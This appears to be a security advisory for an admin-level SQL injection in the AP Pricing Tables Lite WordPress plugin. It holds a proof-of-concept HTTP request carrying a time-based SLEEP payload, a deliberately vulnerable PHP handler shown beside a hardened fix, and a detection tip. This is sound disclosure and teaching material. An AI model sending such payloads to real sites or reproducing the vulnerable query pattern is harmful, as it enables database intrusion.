wpexploit: Simone Onofri, Donato Onofri
WPEX-ID: F601E637-A486-4F3A-9077-4F294ACE7EA1
History: May 10, 2023 - 12:00 a.m.

AP Pricing Tables Lite <= 1.1.6 - Admin+ SQLi

Tags: ap pricing tables lite, vulnerability, sql injection, admin+, post request

EPSS: 0.012 (Low), percentile 85.3%

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 115
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://localhost/wp-admin/admin.php?page=ap-pricing-tables-lite
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [Admin+]
Connection: close

action=backend_ajax&_action=copy_table&table_id=124+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce=<nonce>
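
The handler shape behind this class of bug, as an added illustration that is not the plugin's own code: the hypothetical vulnerable function concatenates the raw `table_id` POST value into SQL, so a time-based payload like the one in the request above runs as written, while the hardened version coerces the id with `absint()` and binds it through `$wpdb->prepare()`, which collapses that payload to the integer 124. The table name, function names and nonce action are assumptions; only the WordPress APIs used are real.

```php
<?php
// Added example, not code from AP Pricing Tables Lite. Table name, function
// names and the nonce action are assumptions; $wpdb, absint(),
// check_ajax_referer() and current_user_can() are real WordPress APIs.

// Vulnerable shape: the untrusted POST value is concatenated into the query,
// so "124 AND (SELECT 2035 FROM (SELECT(SLEEP(10)))A)" is executed by MySQL.
function ap_copy_table_vulnerable_example() {
    global $wpdb;
    $table_id = $_POST['table_id'];  // untrusted string, never validated
    return $wpdb->get_row(
        "SELECT * FROM {$wpdb->prefix}ap_pricing_tables WHERE id = " . $table_id
    );
}

// Hardened shape. Note that the nonce and capability checks alone do not fix
// the advisory's issue (the attacker is already Admin+); the fix is the
// integer cast plus the %d placeholder, which keep the value from altering
// the statement's structure no matter who sends it.
function ap_copy_table_hardened_example() {
    global $wpdb;

    check_ajax_referer( 'ap_pricing_tables_nonce', '_wpnonce' ); // dies on a bad nonce
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // absint() applies intval() then abs(): the SLEEP() payload above becomes 124.
    $table_id = absint( $_POST['table_id'] ?? 0 );
    if ( 0 === $table_id ) {
        wp_send_json_error( 'invalid table_id', 400 );
    }

    $row = $wpdb->get_row(
        $wpdb->prepare(
            "SELECT * FROM {$wpdb->prefix}ap_pricing_tables WHERE id = %d",
            $table_id
        )
    );
    if ( null === $row ) {
        wp_send_json_error( 'not found', 404 );
    }
    wp_send_json_success( $row );
}
```

A cheap detection check for the same weakness is to grep the plugin for `get_row(`, `get_results(` or `query(` calls whose argument is not wrapped in `$wpdb->prepare()`.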

